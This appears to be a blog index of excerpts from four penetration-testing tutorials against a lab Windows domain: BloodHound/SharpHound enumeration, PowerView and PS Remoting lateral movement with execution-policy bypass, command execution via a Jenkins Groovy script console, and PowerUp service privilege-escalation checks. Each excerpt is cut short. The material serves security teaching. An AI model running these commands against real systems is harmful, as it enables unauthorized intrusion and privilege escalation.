Powershell * POWERSHELL SECURITY

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound Supply data to bloodhound : PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1 PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all –Verbose Now download the file https://neo4j.com/download-center/#community extract the file  and go to bin folder PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\ PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir Now on terminal C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start Now download https://github.com/BloodHoundAD/BloodHound/releases BloodHound-win32-x64.zip file After extraction double click on BloodHound.exe file. […]

Powershell * POWERSHELL SECURITY

Lateral Movement PS Remoting

One to one We required admin rights PS shell to perform all this task . PS C:\WINDOWS\system32> Enable-PSRemoting –Force PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1 [WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami […]

Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 2

As i consider the Jenkin is already present on server and we have the credential with us After login go to : http://192.168.65.195:8080/scirpts/ type this below mention command and click on run Code : def sout = new StringBuffer(), serr = new StringBuffer() def proc = ‘whoami’.execute() proc.consumeProcessOutput(sout,serr) proc.waitForOrKill(1000) println “out>$sout err> $serr” Now try […]

Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 1

Services issues using powerup: PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted –verbose Get services where the current user can write to its binary path or change arguments to the binary: Get services where the current user can write to its binary path or change arguments to the binary: PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose Get the services whose configuration […]